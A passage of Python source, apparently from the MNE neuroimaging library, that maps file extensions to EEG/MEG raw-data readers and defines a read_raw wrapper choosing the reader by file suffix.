# pointing at the companion extension to pass instead (BrainVision
# .vmrk/.eeg files are read via their .vhdr header).
suggested = {".vmrk": partial(_read_unsupported, suggest=".vhdr"),
             ".eeg": partial(_read_unsupported, suggest=".vhdr")}
# All known file formats: supported readers plus known-unsupported hints.
readers = {**supported, **suggested}
@fill_doc
def read_raw(fname, *, preload=False, verbose=None, **kwargs):
    """Read raw file.
    This function is a convenient wrapper for readers defined in `mne.io`. The
    correct reader is automatically selected based on the detected file format.
    All function arguments are passed to the respective reader.
    The following readers are currently supported:
    `~mne.io.read_raw_artemis123`, `~mne.io.read_raw_bdf`,
    `~mne.io.read_raw_boxy`, `~mne.io.read_raw_brainvision`,
    `~mne.io.read_raw_cnt`, `~mne.io.read_raw_ctf`, `~mne.io.read_raw_edf`,
    `~mne.io.read_raw_eeglab`, `~mne.io.read_raw_egi`,
    `~mne.io.read_raw_eximia`, `~mne.io.read_raw_fieldtrip`,
    `~mne.io.read_raw_fif`, `~mne.io.read_raw_gdf`, `~mne.io.read_raw_kit`,
    `~mne.io.read_raw_nicolet`, and `~mne.io.read_raw_nirx`.
    Parameters
    ----------
    fname : path-like
        Name of the file to read.
    %(preload)s
    %(verbose)s
    **kwargs
        Additional keyword arguments to pass to the underlying reader. For
        details, see the arguments of the reader for the respective file
        format.
    Returns
    -------
    raw : mne.io.Raw
        Raw object.
    """
    # Join all suffixes so compound extensions like ".fif.gz" are matched.
    extension = "".join(Path(fname).suffixes)
    reader = readers.get(extension)
    if reader is None:
        _read_unsupported(fname)  # always raises ValueError
    return reader(fname, preload=preload, verbose=verbose, **kwargs)
| 324 | 0 | 23 |